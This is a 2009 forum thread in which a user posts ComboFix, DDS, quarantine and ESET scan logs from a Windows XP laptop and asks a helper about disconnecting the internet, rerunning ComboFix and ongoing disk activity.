((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NoAds"="c:\program files\NoAds\NoAds.exe" [2007-10-27 151552]
"Mmm"="c:\program files\HACE\Mmm\Mmm.exe" [2005-07-05 828416]
"WMPNSCFG"="c:\program files\Windows Media Player\WMPNSCFG.exe" [2006-10-18 204288]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\System32\igfxtray.exe" [2003-04-07 155648]
"HotKeysCmds"="c:\windows\System32\hkcmd.exe" [2003-04-07 114688]
"00THotkey"="c:\windows\System32\00THotkey.exe" [2003-05-23 253952]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2003-07-17 159744]
"TouchED"="c:\program files\TOSHIBA\TouchED\TouchED.Exe" [2003-03-11 122880]
"PadTouch"="c:\program files\TOSHIBA\PadTouch\PadExe.exe" [2003-11-24 1019904]
"NeroCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648]
"AVG8_TRAY"="c:\progra~1\AVG\AVG8\avgtray.exe" [2009-08-21 2007832]
"Malwarebytes Anti-Malware (reboot)"="c:\program files\Malwarebytes' Anti-Malware\mbam.exe" [2009-09-10 1312080]
"000StTHK"="000StTHK.exe" - c:\windows\system32\000StTHK.exe [2001-06-23 24576]
"LTSMMSG"="LTSMMSG.exe" - c:\windows\ltsmmsg.exe [2003-04-18 32768]
"TFNF5"="TFNF5.exe" - c:\windows\system32\TFNF5.exe [2003-10-15 73728]
"TPSMain"="TPSMain.exe" - c:\windows\system32\TPSMain.exe [2003-11-27 266240]
"TFncKy"="TFncKy.exe" [bU]
"Kernel and Hardware Abstraction Layer"="KHALMNPR.EXE" - c:\windows\KHALMNPR.Exe [2008-12-18 76304]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - c:\program files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2008-4-23 29696]
Logitech SetPoint.lnk - c:\program files\Logitech\SetPoint\SetPoint.exe [2009-6-2 809488]
Microsoft Works Calendar Reminders.lnk - c:\program files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe [1999-9-4 53317]
Start GetRight.lnk - c:\program files\GetRight\GetRight.exe [2007-6-28 4628752]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\LBTWlgn]
2009-02-18 23:30 72208 ----a-w- c:\program files\Common Files\Logishrd\Bluetooth\LBTWLgn.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\avgrsstarter]
2009-08-21 05:10 11952 ----a-w- c:\windows\system32\avgrsstx.dll

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WdfLoadGroup]
@=""

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusOverride"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\GetRight\\GetRight.exe"=
"c:\\Program Files\\AVG\\AVG8\\avgupd.exe"=

R1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [19/06/2008 11:53 335240]
R1 SSHDRV76;SSHDRV76;c:\windows\system32\drivers\SSHDRV76.sys [24/05/2008 04:03 53760]
R2 avg8wd;AVG8 WatchDog;c:\progra~1\AVG\AVG8\avgwdsvc.exe [02/02/2009 06:00 297752]
S3 SMCWGU(SMC);SMCWUSB-G 802.11g Wireless USB 2.0 Adapter(SMC);c:\windows\system32\DRIVERS\SMCWGU.sys --> c:\windows\system32\DRIVERS\SMCWGU.sys [?]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://home.live.com/
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Settings,ProxyOverride = <local>
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Download with GetRight - c:\program files\GetRight\GRdownload.htm
IE: Open with GetRight Browser - c:\program files\GetRight\GRbrowse.htm
.
**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-09-17 15:29
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_USERS\S-1-5-21-2888162382-313132713-241459312-1006\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(620)
c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
c:\program files\common files\logishrd\bluetooth\LBTServ.dll

- - - - - - - > 'explorer.exe'(1576)
c:\program files\Logitech\SetPoint\GameHook.dll
c:\program files\Logitech\SetPoint\lgscroll.dll
c:\program files\NoAds\NoAds.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
c:\windows\system32\TPwrCfg.DLL
c:\windows\system32\TPwrReg.dll
c:\windows\system32\TPSTrace.DLL
.
------------------------ Other Running Processes ------------------------
.
c:\windows\system32\drivers\CDANTSRV.EXE
c:\program files\Toshiba\ConfigFree\CFSvcs.exe
c:\program files\Analog Devices\SoundMAX\SMAgent.exe
c:\program files\Windows Media Player\wmpnetwk.exe
c:\program files\AVG\AVG8\avgrsx.exe
c:\windows\system32\wscntfy.exe
c:\program files\Toshiba\TOSHIBA Controls\TFncKy.exe
c:\windows\system32\TPSBattM.exe
c:\program files\Apoint2K\ApntEx.exe
c:\program files\Common Files\Logishrd\KHAL2\KHALMNPR.exe
.
**************************************************************************
.
Completion time: 2009-09-17 15:36 - machine was rebooted
ComboFix-quarantined-files.txt 2009-09-17 14:35
ComboFix2.txt 2009-09-15 23:06

Pre-Run: 2,953,441,280 bytes free
Post-Run: 2,902,618,112 bytes free

150

Here is the quarantine log for ComboFix as well. I know you didn't ask for it, but I saw it had received a few more entries since the last time:

2009-09-17 14:20:21 . 2009-09-17 14:20:21 2,324 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Service_gkmixern.reg.dat
2009-09-17 14:20:21 . 2009-09-17 14:20:21 286 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Legacy_GKMIXERN.reg.dat
2009-09-17 14:14:14 . 2009-09-17 14:14:14 0 ----a-w- C:\Qoobox\Quarantine\catchme.txt
2009-09-15 23:03:39 . 2009-09-15 23:03:39 680 ----a-w- C:\Qoobox\Quarantine\Registry_backups\AddRemove-TouchED.reg.dat
2009-09-15 23:03:39 . 2009-09-15 23:03:39 782 ----a-w- C:\Qoobox\Quarantine\Registry_backups\AddRemove-Power Saver.reg.dat
2009-09-15 22:58:09 . 2009-09-17 14:20:01 6,504 ----a-w- C:\Qoobox\Quarantine\Registry_backups\tcpip.reg
2009-09-15 22:46:21 . 2009-09-17 14:11:57 102 ----a-w- C:\Qoobox\Quarantine\catchme.log
2009-06-02 21:35:53 . 2009-06-02 21:35:53 53,248 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\user\Application Data\Microsoft\Installer\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}\ARPPRODUCTICON.exe.vir
2002-12-11 19:39:08 . 2002-12-11 19:39:08 10,995,712 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\Installer\WMEncoder.msi.vir

Next is the log for NOD32:

ESETSmartInstaller@High as CAB hook log:
OnlineScanner.ocx - registred OK
# version=6
# iexplore.exe=7.00.6000.16791 (vista_gdr.081217-1620)
# OnlineScanner.ocx=1.0.0.6050
# api_version=3.0.2
# EOSSerial=cf5e79d1be913942bfcccf9d9a7fda7f
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2009-09-17 06:40:34
# local_time=2009-09-17 07:40:34 (+0000, GMT Daylight Time)
# country="United Kingdom"
# lang=1033
# osver=5.1.2600 NT Service Pack 3
# compatibility_mode=1026 37 66 100 23814030781250
# scanned=360755
# found=0
# cleaned=0
# scan_time=10304

Shortly before running ComboFix I switched off my router to kill the internet connection. Was it okay to do this? You said to disconnect from the internet, but I wasn't sure if switching it off would prevent certain checks. I forgot I could alternatively switch off the connection via the Local Area Connection icon in the System Tray.

I'm still getting that 13.5KB worth of disk access every ten seconds, even after all of this. Could it be nothing to be worried about, seeing as all these scans haven't affected it?

Regards.
18. Thanks for the reply. I didn't want to go ahead with this until I was absolutely certain. In your last post you said to download ComboFix but not run it (and further down you said not to run ComboFix more than once). However, I ran ComboFix after receiving your last post instructing me to do so.

Because my last post was so long with all the added logs, I will give a brief summary of what I did. I switched on my external drive and ran MBAM on a full scan. I then ran DDS.scr once again. After I did this I ran ComboFix for the first time, according to your previous instructions. I then ran HijackThis. After doing this I posted all the logs, in the order that I ran each program (with the exception of any new MBAM log, as it was still showing a clean report).

Therefore, seeing as I have already run ComboFix once, is it still okay to download and run it again, along with the separate script you have provided? I am assuming that if it is indeed okay to do so, I should once again rename ComboFix when saving it to the Desktop, as I was instructed to do last time?

Thanks again.
  19. Sorry once again for the delay. I've had some non-computer related issues to deal with. I also thought it would be a good idea to do a full scan on my external hard drive, seeing as that was on when I got infected. I had it switched off until today because I didn't want any resident nasties transferring over to it, if they hadn't already done so. I don't put programs on it and so wanted to clean up C drive and the registry as much as I could before I used it again. MBAM didn't find anything on there. I did another DDS scan because of the external drive going back on. It was probably unnecessary but thought it wouldn't hurt. I'll list that first, followed by the ComboFix log and HijackThis log. I ran DDS before I ran ComboFix, not afterwards. DDS.txt: DDS (Ver_09-07-30.01) - NTFSx86 Run by user at 23:40:42.34 on 15/09/2009 Internet Explorer: 7.0.5730.11 Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.373 [GMT 1:00] AV: AVG Anti-Virus Free *On-access scanning disabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF} ============== Running Processes =============== C:\WINDOWS\system32\svchost -k DcomLaunch svchost.exe C:\WINDOWS\System32\svchost.exe -k netsvcs svchost.exe svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe -k HTTPFilter C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\PROGRA~1\AVG\AVG8\avgrsx.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\PROGRA~1\AVG\AVG8\avgtray.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\NoAds\NoAds.exe C:\WINDOWS\system32\ctfmon.exe C:\Program Files\HACE\Mmm\Mmm.exe 
C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE C:\Program Files\Internet Explorer\iexplore.exe C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe C:\Documents and Settings\user\Desktop\dds.scr ============== Pseudo HJT Report =============== uStart Page = hxxp://home.live.com/ uSearch Page = hxxp://www.google.com uSearch Bar = hxxp://www.google.com/ie uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8 uInternet Settings,ProxyOverride = <local> uSearchAssistant = hxxp://www.google.com/ie uSearchURL,(Default) = hxxp://www.google.com/search?q=%s mSearchAssistant = hxxp://www.google.com/ie BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\adobe\acrobat 7.0\activex\AcroIEHelper.dll BHO: IE to GetRight Helper: {31ff080d-12a3-439a-a2ef-4ba95a3148e8} - c:\program files\getright\xx2gr.dll BHO: AVG Safe Search: {3ca2f312-6f6e-4b53-a66e-4e65e497c8c0} - c:\program files\avg\avg8\avgssie.dll BHO: Spybot-S&D IE Protection: {53707962-6f74-2d53-2644-206d7942484f} - c:\progra~1\spybot~1\SDHelper.dll BHO: SSVHelper Class: {761497bb-d6f0-462c-b6eb-d4daf1d92d43} - c:\program files\java\jre1.6.0_07\bin\ssv.dll BHO: Google Toolbar Helper: {aa58ed58-01dd-4d91-8333-cf10577473f7} - c:\program files\google\googletoolbar2.dll BHO: Google Toolbar Notifier BHO: {af69de43-7d58-4638-b6fa-ce66b5ad205d} - c:\program files\google\googletoolbarnotifier\3.0.1225.9868\swg.dll TB: &Google: {2318c2b1-4965-11d4-9b18-009027a5cd4f} - c:\program files\google\googletoolbar2.dll TB: Yahoo! 
Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} - EB: {4528BBE0-4E08-11D5-AD55-00010333D0AD} - No File EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File uRun: [NoAds] "c:\program files\noads\NoAds.exe" uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe uRun: [Mmm] "c:\program files\hace\mmm\Mmm.exe" uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe mRun: [igfxTray] c:\windows\system32\igfxtray.exe mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe mRun: [00THotkey] c:\windows\system32\00THotkey.exe mRun: [000StTHK] 000StTHK.exe mRun: [LTSMMSG] LTSMMSG.exe mRun: [Apoint] c:\program files\apoint2k\Apoint.exe mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe mRun: [PadTouch] "c:\program files\toshiba\padtouch\PadExe.exe mRun: [TFNF5] TFNF5.exe mRun: [TPSMain] TPSMain.exe mRun: [TFncKy] TFncKy.exe mRun: [NeroCheck] c:\windows\system32\NeroCheck.exe mRun: [AVG8_TRAY] c:\progra~1\avg\avg8\avgtray.exe mRun: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE mRun: [Malwarebytes Anti-Malware (reboot)] "c:\program files\malwarebytes' anti-malware\mbam.exe" /runcleanupscript StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adober~1.lnk - c:\program files\adobe\acrobat 7.0\reader\reader_sl.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\logite~1.lnk - c:\program files\logitech\setpoint\SetPoint.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\micros~2.lnk - c:\program files\common files\microsoft shared\works shared\wkcalrem.exe StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\startg~1.lnk - c:\program files\getright\GetRight.exe IE: Download with GetRight - c:\program files\getright\GRdownload.htm IE: Open with GetRight Browser - c:\program files\getright\GRbrowse.htm IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe IE: {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - 
{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBC} - c:\program files\java\jre1.6.0_07\bin\ssv.dll IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\progra~1\spybot~1\SDHelper.dll DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} - hxxp://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - hxxp://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - hxxp://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1238014490265 DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jdk/6u7/jinstall-6u7-windows-i586-jc.cab?e=1222427383613&h=b8ac855f339f32209a0ec00ff741fe50/&filename=jinstall-6u7-windows-i586-jc.cab DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} - hxxp://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} - hxxp://crucial.com/controls/cpcScanner.cab DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab DPF: {D821DC4A-0814-435E-9820-661C543A4679} - hxxp://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\program files\avg\avg8\avgpp.dll Notify: avgrsstarter - avgrsstx.dll Notify: igfxcui - igfxsrvc.dll Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll SSODL: WPDShServiceObj - 
{AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll ============= SERVICES / DRIVERS =============== R1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [2008-6-19 335240] R1 AvgMfx86;AVG On-access Scanner Minifilter Driver x86;c:\windows\system32\drivers\avgmfx86.sys [2008-6-19 27784] R1 SSHDRV76;SSHDRV76;c:\windows\system32\drivers\SSHDRV76.sys [2008-5-24 53760] R2 avg8wd;AVG8 WatchDog;c:\progra~1\avg\avg8\avgwdsvc.exe [2009-2-2 297752] S3 gkmixern;gkmixern;c:\docume~1\user\locals~1\temp\gkmixern.sys [2003-3-6 15872] S3 SMCWGU(SMC);SMCWUSB-G 802.11g Wireless USB 2.0 Adapter(SMC);c:\windows\system32\drivers\smcwgu.sys --> c:\windows\system32\drivers\SMCWGU.sys [?] =============== Created Last 30 ================ 2009-09-13 03:38 38,224 a------- c:\windows\system32\drivers\mbamswissarmy.sys 2009-09-13 03:38 19,160 a------- c:\windows\system32\drivers\mbam.sys 2009-09-13 03:38 <DIR> --d----- c:\program files\Malwarebytes' Anti-Malware 2009-09-03 04:25 <DIR> --d----- c:\docume~1\user\applic~1\Malwarebytes 2009-09-03 04:25 <DIR> --d----- c:\docume~1\alluse~1\applic~1\Malwarebytes 2009-08-31 22:37 <DIR> --d----- c:\program files\Trend Micro 2009-08-21 11:05 1,717,410 a------- C:\00.bmp ==================== Find3M ==================== 2009-08-24 03:17 123 a------- C:\drmHeader.bin 2009-08-21 06:10 335,240 a------- c:\windows\system32\drivers\avgldx86.sys 2009-08-21 06:10 11,952 a------- c:\windows\system32\avgrsstx.dll 2008-05-14 18:56 32,768 a--sh--- c:\windows\system32\config\systemprofile\local settings\history\history.ie5\mshist012008051420080515\index.dat 2008-03-27 14:15 49,152 a--sh--- c:\windows\temp\temporary internet files\content.ie5\index.dat ============= FINISH: 23:41:55.79 =============== Another Attach.zip has been attached to this post. 
Next is the ComboFix log: ComboFix 09-09-14.02 - user 15/09/2009 23:53.1.1 - NTFSx86 Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.434 [GMT 1:00] Running from: c:\documents and settings\user\Desktop\Combo-Fix.exe AV: AVG Anti-Virus Free *On-access scanning disabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF} . ((((((((((((((((((((((((((((((((((((((( Other Deletions ))))))))))))))))))))))))))))))))))))))))))))))))) . c:\documents and settings\user\Application Data\Microsoft\Installer\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}\ARPPRODUCTICON.exe c:\recycler\S-1-5-21-1644491937-1767777339-725345543-1003 c:\recycler\S-1-5-21-2616697278-285125850-4245720333-1003 c:\windows\Installer\WMEncoder.msi . ((((((((((((((((((((((((( Files Created from 2009-08-15 to 2009-09-15 ))))))))))))))))))))))))))))))) . 2009-09-13 02:38 . 2009-09-10 13:54 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys 2009-09-13 02:38 . 2009-09-13 02:38 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware 2009-09-13 02:38 . 2009-09-10 13:53 19160 ----a-w- c:\windows\system32\drivers\mbam.sys 2009-09-03 03:25 . 2009-09-03 03:25 -------- d-----w- c:\documents and settings\user\Application Data\Malwarebytes 2009-09-03 03:25 . 2009-09-03 03:25 -------- d-----w- c:\documents and settings\All Users\Application Data\Malwarebytes 2009-08-31 21:37 . 2009-08-31 21:37 -------- d-----w- c:\program files\Trend Micro . (((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))) . 2009-09-13 08:53 . 2007-06-28 00:17 -------- d-----w- c:\program files\GetRight 2009-09-04 00:19 . 2005-05-27 22:46 -------- d-----w- c:\program files\ahead 2009-09-03 23:36 . 2003-12-03 15:08 -------- d--h--w- c:\program files\InstallShield Installation Information 2009-09-03 23:36 . 2007-08-13 07:14 -------- d-----w- c:\program files\Real 2009-09-03 23:32 . 2008-03-11 21:50 -------- d-----w- c:\program files\Meridian Advance 2009-09-03 01:46 . 
2007-07-03 20:38 -------- d-----w- c:\program files\Bulk Image Downloader 2009-09-03 01:45 . 2009-04-16 05:46 -------- d-----w- c:\program files\PicaLoader 2009-08-30 17:55 . 2007-12-29 12:48 -------- d-----w- c:\documents and settings\user\Application Data\uTorrent 2009-08-24 02:17 . 2009-02-27 16:43 123 ----a-w- C:\drmHeader.bin 2009-08-21 10:05 . 2009-07-17 17:33 -------- d-----w- c:\documents and settings\user\Application Data\Free Audio Editor 2009-08-21 05:10 . 2008-06-19 10:53 11952 ----a-w- c:\windows\system32\avgrsstx.dll 2009-08-21 05:10 . 2008-06-19 10:53 335240 ----a-w- c:\windows\system32\drivers\avgldx86.sys 2009-08-21 05:10 . 2008-06-19 10:53 27784 ----a-w- c:\windows\system32\drivers\avgmfx86.sys 2009-07-29 22:14 . 2009-07-29 22:14 -------- d-----w- c:\program files\LucasArts . ((((((((((((((((((((((((((((((((((((( Reg Loading Points )))))))))))))))))))))))))))))))))))))))))))))))))) . . *Note* empty entries & legit default entries are not shown REGEDIT4 [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "NoAds"="c:\program files\NoAds\NoAds.exe" [2007-10-27 151552] "Mmm"="c:\program files\HACE\Mmm\Mmm.exe" [2005-07-05 828416] "WMPNSCFG"="c:\program files\Windows Media Player\WMPNSCFG.exe" [2006-10-18 204288] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "IgfxTray"="c:\windows\System32\igfxtray.exe" [2003-04-07 155648] "HotKeysCmds"="c:\windows\System32\hkcmd.exe" [2003-04-07 114688] "00THotkey"="c:\windows\System32\00THotkey.exe" [2003-05-23 253952] "Apoint"="c:\program files\Apoint2K\Apoint.exe" [2003-07-17 159744] "TouchED"="c:\program files\TOSHIBA\TouchED\TouchED.Exe" [2003-03-11 122880] "PadTouch"="c:\program files\TOSHIBA\PadTouch\PadExe.exe" [2003-11-24 1019904] "NeroCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648] "AVG8_TRAY"="c:\progra~1\AVG\AVG8\avgtray.exe" [2009-08-21 2007832] "Malwarebytes Anti-Malware (reboot)"="c:\program files\Malwarebytes' Anti-Malware\mbam.exe" [2009-09-10 1312080] 
"000StTHK"="000StTHK.exe" - c:\windows\system32\000StTHK.exe [2001-06-23 24576]
"LTSMMSG"="LTSMMSG.exe" - c:\windows\ltsmmsg.exe [2003-04-18 32768]
"TFNF5"="TFNF5.exe" - c:\windows\system32\TFNF5.exe [2003-10-15 73728]
"TPSMain"="TPSMain.exe" - c:\windows\system32\TPSMain.exe [2003-11-27 266240]
"TFncKy"="TFncKy.exe" [bU]
"Kernel and Hardware Abstraction Layer"="KHALMNPR.EXE" - c:\windows\KHALMNPR.Exe [2008-12-18 76304]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - c:\program files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2008-4-23 29696]
Logitech SetPoint.lnk - c:\program files\Logitech\SetPoint\SetPoint.exe [2009-6-2 809488]
Microsoft Works Calendar Reminders.lnk - c:\program files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe [1999-9-4 53317]
Start GetRight.lnk - c:\program files\GetRight\GetRight.exe [2007-6-28 4628752]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\LBTWlgn]
2009-02-18 23:30 72208 ----a-w- c:\program files\Common Files\Logishrd\Bluetooth\LBTWLgn.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\avgrsstarter]
2009-08-21 05:10 11952 ----a-w- c:\windows\system32\avgrsstx.dll

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WdfLoadGroup]
@=""

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusOverride"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\GetRight\\GetRight.exe"=
"c:\\Program Files\\AVG\\AVG8\\avgupd.exe"=

R1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [19/06/2008 11:53 335240]
R1 SSHDRV76;SSHDRV76;c:\windows\system32\drivers\SSHDRV76.sys [24/05/2008 04:03 53760]
R2 avg8wd;AVG8 WatchDog;c:\progra~1\AVG\AVG8\avgwdsvc.exe [02/02/2009 06:00 297752]
S3 gkmixern;gkmixern;\??\c:\docume~1\user\LOCALS~1\Temp\gkmixern.sys --> c:\docume~1\user\LOCALS~1\Temp\gkmixern.sys [?]
S3 SMCWGU(SMC);SMCWUSB-G 802.11g Wireless USB 2.0 Adapter(SMC);c:\windows\system32\DRIVERS\SMCWGU.sys --> c:\windows\system32\DRIVERS\SMCWGU.sys [?]
.
Contents of the 'Scheduled Tasks' folder
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://home.live.com/
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Settings,ProxyOverride = <local>
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Download with GetRight - c:\program files\GetRight\GRdownload.htm
IE: Open with GetRight Browser - c:\program files\GetRight\GRbrowse.htm
.
- - - - ORPHANS REMOVED - - - -

AddRemove-Power Saver - c:\windows\IsUninst.exe -fc:\program files\TOSHIBA\Power Saver\Uninst.isu
AddRemove-TouchED - c:\windows\IsUninst.exe -fc:\program files\TOSHIBA\TouchED\Uninst.isu

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-09-16 00:01
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_USERS\S-1-5-21-2888162382-313132713-241459312-1006\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)

[HKEY_USERS\S-1-5-21-2888162382-313132713-241459312-1006\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{6ED6B123-E96B-45E7-E2F0-5912F5D50D24}*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
"iaelpmfpbpbijooano"=hex:6a,61,70,61,69,66,70,67,66,6b,65,63,67,67,66,61,6c,67, 6c,65,00,00
"hakllaiaiffaogge"=hex:6a,61,70,61,69,66,70,67,66,6b,65,63,67,67,66,61,6c,67, 6c,65,00,00
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(620)
c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
c:\program files\common files\logishrd\bluetooth\LBTServ.dll
.
